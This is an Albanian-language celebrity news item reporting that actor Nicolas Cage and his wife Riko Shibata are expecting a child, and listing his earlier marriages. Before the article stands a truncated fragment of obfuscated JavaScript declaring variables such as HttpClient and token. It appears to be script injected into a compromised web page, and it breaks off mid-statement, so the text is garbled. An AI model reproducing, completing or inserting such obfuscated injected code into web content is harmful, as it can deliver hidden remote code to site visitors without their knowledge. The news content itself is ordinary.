;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Aktori i njohur së shpejti do të bëhet sërish baba

By

Aktori i filmit “The Family Man” do të bëhet sërish baba.

Nicolas Cage dhe gruaja e tij, Riko Shibata, do të bëhen prindër, konfirmoi përfaqësuesi i aktorit për Page Six të enjten.

“Prindërit e ardhshëm janë të gëzuar!” i tha edhe publicisti gazetës ‘People’. Një datë e caktuar apo gjinia e fëmijës nuk u njoftua.

Ndërkohë, Cage ka dy fëmijë të tjerë nga lidhjet e mëparshme.

Dyshja u martuan në shkurt të vitit 2021 në hotelin Wynn në Las Vegas. Ajo është gruaja e pestë e yllit të të famshëm amerikan.

Në kohën e dasmës së tyre, Cage tha në një deklaratë: “Është e vërtetë, dhe ne jemi shumë të lumtur”.

Çifti u takua në Shiga, Japoni dhe kanë qenë së bashku që pak kohë pas shpërbërjes së martesës së fundit të Cage, me Erika Koike, e cila zgjati katër ditë në vitin 2019.

Ai ishte gjithashtu i martuar më parë me Patricia Arquette nga 1995 në 2001, Lisa Marie Presley nga 2002 në 2004 dhe Alice Kim nga 2004 në 2016.

Artikuj të ngjashëm